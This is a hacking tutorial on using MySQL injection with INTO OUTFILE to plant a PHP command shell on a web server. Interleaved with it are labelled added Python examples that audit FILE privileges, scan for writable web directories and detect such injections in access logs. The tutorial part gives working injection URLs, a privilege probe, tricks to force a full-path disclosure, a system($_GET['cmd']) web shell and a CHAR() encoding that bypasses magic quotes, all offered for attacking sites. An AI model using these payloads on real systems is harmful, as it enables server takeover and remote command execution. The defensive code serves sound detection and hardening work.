INTO OUTFILE uploading your shell with MySQL Injection


This is not used a lot, but if you find a target where the database user is either root or a user granted root-level permissions, and that user has the FILE privilege, we will be able to upload a shell with MySQL injection.
I will explain it step by step.
1. Find out if it's the root user (we do that by using user() in our vulnerable column).
2. If it's the root user, we have to check the privileges of the user.
3. We have to find the full path to the current user's web directory.
4. We have to test whether the server has 'magic quotes' on or not (IMPORTANT!).
5. Take over time :D.
So let's explain it some more. First we need to find out if our user is root; we do that with the following query:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,user,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from mysql.user--
So in my example I am currently the root user. I'm like 'yay cool', but we aren't there yet, my young Padawans!
Now that we know it's root, we check its privileges using the following query:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,concat_ws(':',user,file_priv),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
If it results in the output:
Root:Y
then we have a bingo and will be able to use INTO OUTFILE to upload a shell. Now let's continue and see if we can find the FULL PATH to upload the shell to (the full path is important, as a user is bound to a certain path for their site).
Sometimes we get lucky and obtain the full path, but not all SQL errors will spit it out.
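Steps 1 and 2 above are, from the attacker's side, a test of two server settings: whether the account the page connects as holds the FILE privilege, and whether secure_file_priv still allows INTO OUTFILE at all. The following is an added example (not code from the tutorial) that audits those two settings from the defender's side: paste in the rows of `SELECT user, host, file_priv FROM mysql.user;` and the value of `SHOW VARIABLES LIKE 'secure_file_priv';`. The rows below are constructed, and `webapp` is an assumed name for the account the PHP application connects as (in the tutorial's scenario that would be `root`, the output of user()).

```python
"""Audit a MySQL server for INTO OUTFILE exposure (added example, not from
the tutorial): FILE privilege holders plus the secure_file_priv setting.
The sample rows are constructed; 'webapp' is an assumed account name."""
from typing import Optional

# Constructed sample of mysql.user: (user, host, file_priv)
SAMPLE_USERS = [
    ("root", "localhost", "Y"),
    ("webapp", "localhost", "Y"),   # the application account: must not hold FILE
    ("report", "%", "N"),
]


def outfile_policy(secure_file_priv: Optional[str]) -> str:
    """Map secure_file_priv to what INTO OUTFILE can do: SQL NULL (None here)
    disables it completely, the empty string lets mysqld write anywhere its
    OS account can, and a path confines writes to that directory (still
    dangerous if that directory sits under the web root)."""
    if secure_file_priv is None:
        return "disabled"
    if secure_file_priv == "":
        return "unrestricted"
    return "restricted"


def file_priv_findings(rows, web_account: str = "webapp") -> list:
    """Return one finding per account holding FILE, worst first, each with
    the REVOKE statement that removes the privilege."""
    severity = {web_account: 0, "root": 1}
    labels = ["critical", "high", "medium"]
    findings = []
    for user, host, file_priv in rows:
        if file_priv != "Y":
            continue
        rank = severity.get(user, 2)
        findings.append({
            "user": user, "host": host, "severity": labels[rank],
            "fix": f"REVOKE FILE ON *.* FROM '{user}'@'{host}';",
        })
    return sorted(findings, key=lambda f: labels.index(f["severity"]))


def injection_can_write_files(rows, secure_file_priv, web_account="webapp") -> bool:
    """The condition the tutorial relies on: the account behind the injectable
    page holds FILE and secure_file_priv has not disabled INTO OUTFILE."""
    if outfile_policy(secure_file_priv) == "disabled":
        return False
    return any(u == web_account and p == "Y" for u, _h, p in rows)


if __name__ == "__main__":
    for f in file_priv_findings(SAMPLE_USERS):
        print(f["severity"], f["user"], f["host"], "->", f["fix"])
    print("writable via injection:", injection_can_write_files(SAMPLE_USERS, ""))
```

The two fixes the findings point at are independent: revoking FILE from the application account stops this whole technique even if secure_file_priv is empty, and setting secure_file_priv to NULL (or to a directory outside the web root) stops it even for an account that still holds FILE.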

Tips & tricks to get a full path disclosure:
1. Use [] before the = sign; this will error out, as it's not valid.
2. If that doesn't work, use Tamper Data / livehttpeditor / a cookie editor to set your PHPSESSID or cookie to 0, then refresh (as the session / cookie won't be valid, it will again error out).
Now that we have found the full path, we can try to upload a BASIC PHP shell to execute commands for us; we do that using INTO OUTFILE. Let me show you a quick example:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,"Hello world",6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 INTO OUTFILE /home/mx/public_html/hello.php--
If we are allowed to create a new file in that directory, it will now have created hello.php on www.site.com, as my full path is /home/mx/public_html.

Common errors:
1. Error code 13: the directory you are trying to create the new file in is not writable (777).
2. Error code 2: wrong path.
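Error code 13 is the server's file-system permissions doing their job: INTO OUTFILE creates the file as the operating-system account mysqld runs under, so the write only succeeds where a directory under the web root is writable by that account (the 777 case above). The following is an added example (not code from the tutorial) that walks a web root and lists the directories such an account could write into; the mysqld uid and gid are parameters (on a real host take them from `id mysql`, an assumed account name), and the fixture directory tree is constructed.

```python
"""List directories under a web root that the MySQL server's OS account could
write into (added example, not from the tutorial). uid/gids describe the
mysqld process; the demo tree is constructed."""
import os
import stat
import tempfile


def dir_writable_by(path: str, uid: int, gids: set) -> bool:
    """Decide from the mode bits whether a process running as uid/gids could
    create a file in `path`. os.access() is deliberately avoided: it answers
    for the *current* process, which is usually not the mysqld account."""
    if uid == 0:
        return True          # root bypasses mode bits; mysqld must never run as root
    st = os.stat(path)
    mode = st.st_mode
    if st.st_uid == uid:
        return bool(mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def writable_dirs(webroot: str, uid: int, gids: set) -> list:
    """Walk the web root and return (relative to it) every directory mysqld
    could write into."""
    hits = []
    for dirpath, _dirnames, _files in os.walk(webroot):
        if dir_writable_by(dirpath, uid, gids):
            hits.append(os.path.relpath(dirpath, webroot))
    return sorted(hits)


def demo_tree_scan() -> list:
    """Constructed fixture: a throwaway docroot with one 755 and one 777
    directory, scanned as a uid/gid that owns nothing in it."""
    root = tempfile.mkdtemp(prefix="docroot_")
    os.mkdir(os.path.join(root, "css"))
    os.chmod(os.path.join(root, "css"), 0o755)
    os.mkdir(os.path.join(root, "images"))
    os.chmod(os.path.join(root, "images"), 0o777)
    # ids chosen so they are neither the owner nor the group of the fixture
    foreign_uid, foreign_gid = os.getuid() + 1, os.getgid() + 1
    return writable_dirs(root, foreign_uid, {foreign_gid})


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        root, mysql_uid = sys.argv[1], int(sys.argv[2])
        for d in writable_dirs(root, mysql_uid, {mysql_uid}):
            print("mysqld could write into:", os.path.join(root, d))
    else:
        print("demo:", demo_tree_scan())
```

Run it as `python3 scan.py /home/mx/public_html "$(id -u mysql)"` (path and account name assumed); every directory it prints is one where the error-13 protection is absent, and the fix is to remove the world- or group-write bit rather than to hunt for the path the way the tutorial does.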
Now to upload a shell we use this basic code to upload with:
So our query would look like:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4, ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 INTO OUTFILE "/home/mx/public_html/shell.php
If the page returns without error code 13 or 2, or any other error code, the shell should have been uploaded.
We can check by going to it and entering ?cmd=ls -la, like the following:
This should show us the current directory and the files within it.
But there wasn't an error and my shell is still not there?
Well, in that case we would have to use Acunetix to do a SIMPLE folder scan, and change our path to whatever folder shows up: imagine they have an /images folder, then we just add /images to our path.
Magic quotes is on and I can't upload my shell?!
No worries, we can bypass that using CHAR(). Some sites with 'magic quotes' on will filter out the quote signs when uploading a shell, so only CHAR() will work: use HackBar to convert the tags into CHAR(60,63) and CHAR(63,62).
This will result in the following query:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4, CHAR(60,63)  "system($_GET['cmd']); "  CHAR(63,62),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 INTO OUTFILE "/home/mx/public_html/shell.php
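Every query in this tutorial travels in the URL of a GET request, so the whole sequence (the user() probe, the mysql.user / file_priv read, the INTO OUTFILE write, and the CHAR()-encoded variant used against magic quotes) is visible in the web server's access log. The following is an added example (not code from the tutorial) of detection logic over such log lines: it undoes URL encoding, `+` spacing, inline `/**/` comments and mixed case before matching, and renders CHAR() sequences back into text so an analyst sees what was being written. The log lines are constructed in Combined Log Format and mirror the tutorial's queries.

```python
"""Flag requests in a web access log that carry a MySQL INTO OUTFILE / DUMPFILE
injection, including the CHAR()-encoded form (added example, not from the
tutorial). The log lines are constructed."""
import re
from urllib.parse import unquote_plus

SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /view.php?id=25 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /view.php?id=25+and+1%3D0+union+all+select+1,2,3,4,concat_ws(%27:%27,user,file_priv),6+from+mysql.user-- HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /view.php?id=25+and+1%3D0+union+all+select+1,2,3,4,CHAR(60,63),6+INTO+OUTFILE+%22/home/mx/public_html/hello.php%22 HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /view.php?id=25+UnIoN/**/SeLeCt+1+iNtO/**/dUmPfIlE+%27/tmp/a%27-- HTTP/1.1" 500 0',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
CHAR_RE = re.compile(r'char\s*\(\s*([\d\s,]+)\)', re.I)
UNION_RE = re.compile(r'\bunion\b.*\bselect\b')
OUTFILE_RE = re.compile(r'\binto\s+(?:out|dump)file\b')


def normalize(path: str) -> str:
    """Undo the evasions a naive signature trips over: URL decoding (twice,
    for double encoding), '+' as space, inline /**/ comments, mixed case and
    runs of whitespace."""
    s = unquote_plus(unquote_plus(path))
    s = re.sub(r'/\*.*?\*/', ' ', s)
    return re.sub(r'\s+', ' ', s).lower()


def decode_char_calls(sql: str) -> str:
    """Render CHAR(60,63)-style sequences as the text they build, so the
    analyst sees what the attacker tried to write rather than numbers."""
    def expand(m):
        return ''.join(chr(int(n)) for n in m.group(1).split(',') if n.strip())
    return CHAR_RE.sub(expand, sql)


def classify(path: str) -> dict:
    """Score one request path."""
    n = normalize(path)
    return {
        "union_select": bool(UNION_RE.search(n)),
        "into_outfile": bool(OUTFILE_RE.search(n)),
        "reads_mysql_user": "mysql.user" in n or "file_priv" in n,
        "decoded": decode_char_calls(n),
    }


def scan(lines) -> list:
    """Return (severity, raw path, decoded query) for every suspicious request."""
    alerts = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = m.group(1)
        c = classify(path)
        if c["into_outfile"]:
            severity = "critical"      # file write attempt on the server
        elif c["union_select"] or c["reads_mysql_user"]:
            severity = "high"          # privilege reconnaissance
        else:
            continue
        alerts.append((severity, path, c["decoded"]))
    return alerts


if __name__ == "__main__":
    for severity, path, decoded in scan(SAMPLE_LOG):
        print(f"[{severity}] {path}\n    -> {decoded}")
```

A 500 status on a request that decodes to INTO OUTFILE is the error-13 or error-2 case from the server's point of view and still deserves the critical alert: the injection itself already worked, only the file write failed.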